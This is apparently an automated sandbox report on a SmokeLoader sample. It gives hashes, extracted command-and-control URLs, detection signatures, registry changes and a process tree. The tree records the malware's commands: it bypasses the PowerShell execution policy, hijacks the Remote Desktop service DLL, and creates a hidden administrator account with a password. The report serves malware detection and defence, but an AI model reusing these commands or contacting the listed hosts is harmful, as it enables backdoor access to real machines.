Analysis
-
max time kernel
151s -
max time network
140s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28-10-2021 15:54
Static task
static1
Behavioral task
behavioral1
Sample
e5bda93ec7d8724ce496359c5e3efabe.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
e5bda93ec7d8724ce496359c5e3efabe.exe
Resource
win10-en-20210920
General
-
Target
e5bda93ec7d8724ce496359c5e3efabe.exe
-
Size
185KB
-
MD5
e5bda93ec7d8724ce496359c5e3efabe
-
SHA1
ad9e1db817d0c69760155939c2fd633031f10418
-
SHA256
0610000cdfda33355202ed75a2f542cf035207e5d26d5e4b11063a17cdcdc8be
-
SHA512
53a1e16ab40c0173248b9adf8bb4ecf04fef532301581c63b3876803c8234185fedf4dd588d768e29b610dd5ecc62f933dd79427f086c89741768e5c8cfe9948
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 52 1088 powershell.exe 55 1088 powershell.exe 56 1088 powershell.exe 57 1088 powershell.exe 59 1088 powershell.exe 61 1088 powershell.exe 64 1088 powershell.exe 66 1088 powershell.exe 68 1088 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
3767.exepid process 3988 3767.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3032 -
Loads dropped DLL 2 IoCs
Processes:
pid process 3316 3316 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1t1pc0hu.eqr.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI98E1.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tix554wn.3fr.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9901.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9922.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9923.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI9902.tmp powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
e5bda93ec7d8724ce496359c5e3efabe.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e5bda93ec7d8724ce496359c5e3efabe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e5bda93ec7d8724ce496359c5e3efabe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e5bda93ec7d8724ce496359c5e3efabe.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 55 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 56 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 57 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e5bda93ec7d8724ce496359c5e3efabe.exepid process 3316 e5bda93ec7d8724ce496359c5e3efabe.exe 3316 e5bda93ec7d8724ce496359c5e3efabe.exe 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3032 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 632 632 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
e5bda93ec7d8724ce496359c5e3efabe.exepid process 3316 e5bda93ec7d8724ce496359c5e3efabe.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 600 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeIncreaseQuotaPrivilege 1508 powershell.exe Token: SeSecurityPrivilege 1508 powershell.exe Token: SeTakeOwnershipPrivilege 1508 powershell.exe Token: SeLoadDriverPrivilege 1508 powershell.exe Token: SeSystemProfilePrivilege 1508 powershell.exe Token: SeSystemtimePrivilege 1508 powershell.exe Token: SeProfSingleProcessPrivilege 1508 powershell.exe Token: SeIncBasePriorityPrivilege 1508 powershell.exe Token: SeCreatePagefilePrivilege 1508 powershell.exe Token: SeBackupPrivilege 1508 powershell.exe Token: SeRestorePrivilege 1508 powershell.exe Token: SeShutdownPrivilege 1508 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeSystemEnvironmentPrivilege 1508 powershell.exe Token: SeRemoteShutdownPrivilege 1508 powershell.exe Token: SeUndockPrivilege 1508 powershell.exe Token: SeManageVolumePrivilege 1508 powershell.exe Token: 33 1508 powershell.exe Token: 34 1508 powershell.exe Token: 35 1508 powershell.exe Token: 36 1508 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeIncreaseQuotaPrivilege 1680 powershell.exe Token: SeSecurityPrivilege 1680 powershell.exe Token: SeTakeOwnershipPrivilege 1680 powershell.exe Token: SeLoadDriverPrivilege 1680 powershell.exe Token: SeSystemProfilePrivilege 1680 powershell.exe Token: SeSystemtimePrivilege 1680 powershell.exe Token: SeProfSingleProcessPrivilege 1680 powershell.exe Token: SeIncBasePriorityPrivilege 1680 powershell.exe Token: SeCreatePagefilePrivilege 1680 powershell.exe Token: SeBackupPrivilege 1680 powershell.exe Token: SeRestorePrivilege 1680 powershell.exe Token: SeShutdownPrivilege 1680 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeSystemEnvironmentPrivilege 1680 powershell.exe Token: SeRemoteShutdownPrivilege 1680 powershell.exe Token: SeUndockPrivilege 1680 powershell.exe Token: SeManageVolumePrivilege 1680 powershell.exe Token: 33 1680 powershell.exe Token: 34 1680 powershell.exe Token: 35 1680 powershell.exe Token: 36 1680 powershell.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeIncreaseQuotaPrivilege 596 powershell.exe Token: SeSecurityPrivilege 596 powershell.exe Token: SeTakeOwnershipPrivilege 596 powershell.exe Token: SeLoadDriverPrivilege 596 powershell.exe Token: SeSystemProfilePrivilege 596 powershell.exe Token: SeSystemtimePrivilege 596 powershell.exe Token: SeProfSingleProcessPrivilege 596 powershell.exe Token: SeIncBasePriorityPrivilege 596 powershell.exe Token: SeCreatePagefilePrivilege 596 powershell.exe Token: SeBackupPrivilege 596 powershell.exe Token: SeRestorePrivilege 596 powershell.exe Token: SeShutdownPrivilege 596 powershell.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeSystemEnvironmentPrivilege 596 powershell.exe Token: SeRemoteShutdownPrivilege 596 powershell.exe Token: SeUndockPrivilege 596 powershell.exe Token: SeManageVolumePrivilege 596 powershell.exe Token: 33 596 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3032 3032 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3032 3032 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3767.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3032 wrote to memory of 3988 3032 3767.exe PID 3032 wrote to memory of 3988 3032 3767.exe PID 3988 wrote to memory of 600 3988 3767.exe powershell.exe PID 3988 wrote to memory of 600 3988 3767.exe powershell.exe PID 600 wrote to memory of 1748 600 powershell.exe csc.exe PID 600 wrote to memory of 1748 600 powershell.exe csc.exe PID 1748 wrote to memory of 940 1748 csc.exe cvtres.exe PID 1748 wrote to memory of 940 1748 csc.exe cvtres.exe PID 600 wrote to memory of 1508 600 powershell.exe powershell.exe PID 600 wrote to memory of 1508 600 powershell.exe powershell.exe PID 600 wrote to memory of 1680 600 powershell.exe powershell.exe PID 600 wrote to memory of 1680 600 powershell.exe powershell.exe PID 600 wrote to memory of 596 600 powershell.exe powershell.exe PID 600 wrote to memory of 596 600 powershell.exe powershell.exe PID 600 wrote to memory of 3592 600 powershell.exe reg.exe PID 600 wrote to memory of 3592 600 powershell.exe reg.exe PID 600 wrote to memory of 3116 600 powershell.exe reg.exe PID 600 wrote to memory of 3116 600 powershell.exe reg.exe PID 600 wrote to memory of 3456 600 powershell.exe reg.exe PID 600 wrote to memory of 3456 600 powershell.exe reg.exe PID 600 wrote to memory of 3188 600 powershell.exe net.exe PID 600 wrote to memory of 3188 600 powershell.exe net.exe PID 3188 wrote to memory of 2160 3188 net.exe net1.exe PID 3188 wrote to memory of 2160 3188 net.exe net1.exe PID 600 wrote to memory of 3812 600 powershell.exe cmd.exe PID 600 wrote to memory of 3812 600 powershell.exe cmd.exe PID 3812 wrote to memory of 2692 3812 cmd.exe cmd.exe PID 3812 wrote to memory of 2692 3812 cmd.exe cmd.exe PID 2692 wrote to memory of 2748 2692 cmd.exe net.exe PID 2692 wrote to memory of 2748 2692 cmd.exe net.exe PID 2748 wrote to memory of 3244 2748 net.exe net1.exe PID 2748 wrote to memory of 3244 2748 net.exe net1.exe PID 600 wrote to memory of 2256 600 powershell.exe cmd.exe PID 600 wrote to memory of 2256 600 powershell.exe cmd.exe PID 2256 wrote to memory of 2208 2256 cmd.exe cmd.exe PID 2256 wrote to memory of 2208 2256 cmd.exe cmd.exe PID 2208 wrote to memory of 2480 2208 cmd.exe net.exe PID 2208 wrote to memory of 2480 2208 cmd.exe net.exe PID 2480 wrote to memory of 2448 2480 net.exe net1.exe PID 2480 wrote to memory of 2448 2480 net.exe net1.exe PID 928 wrote to memory of 3936 928 cmd.exe net.exe PID 928 wrote to memory of 3936 928 cmd.exe net.exe PID 3936 wrote to memory of 1660 3936 net.exe net1.exe PID 3936 wrote to memory of 1660 3936 net.exe net1.exe PID 892 wrote to memory of 836 892 cmd.exe net.exe PID 892 wrote to memory of 836 892 cmd.exe net.exe PID 836 wrote to memory of 1336 836 net.exe net1.exe PID 836 wrote to memory of 1336 836 net.exe net1.exe PID 4036 wrote to memory of 824 4036 cmd.exe net.exe PID 4036 wrote to memory of 824 4036 cmd.exe net.exe PID 824 wrote to memory of 1968 824 net.exe net1.exe PID 824 wrote to memory of 1968 824 net.exe net1.exe PID 2652 wrote to memory of 1724 2652 cmd.exe net.exe PID 2652 wrote to memory of 1724 2652 cmd.exe net.exe PID 1724 wrote to memory of 1964 1724 net.exe net1.exe PID 1724 wrote to memory of 1964 1724 net.exe net1.exe PID 2116 wrote to memory of 1848 2116 cmd.exe net.exe PID 2116 wrote to memory of 1848 2116 cmd.exe net.exe PID 1848 wrote to memory of 3248 1848 net.exe net1.exe PID 1848 wrote to memory of 3248 1848 net.exe net1.exe PID 2384 wrote to memory of 1628 2384 cmd.exe net.exe PID 2384 wrote to memory of 1628 2384 cmd.exe net.exe PID 1628 wrote to memory of 2012 1628 net.exe net1.exe PID 1628 wrote to memory of 2012 1628 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\3767.exeC:\Users\Admin\AppData\Local\Temp\3767.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2swqih2a\2swqih2a.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5010.tmp" "c:\Users\Admin\AppData\Local\Temp\2swqih2a\CSCBD3710FE722445B4ABAE1C68D47DEE80.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr1⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc uc7YWrTP /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc uc7YWrTP /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc uc7YWrTP /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
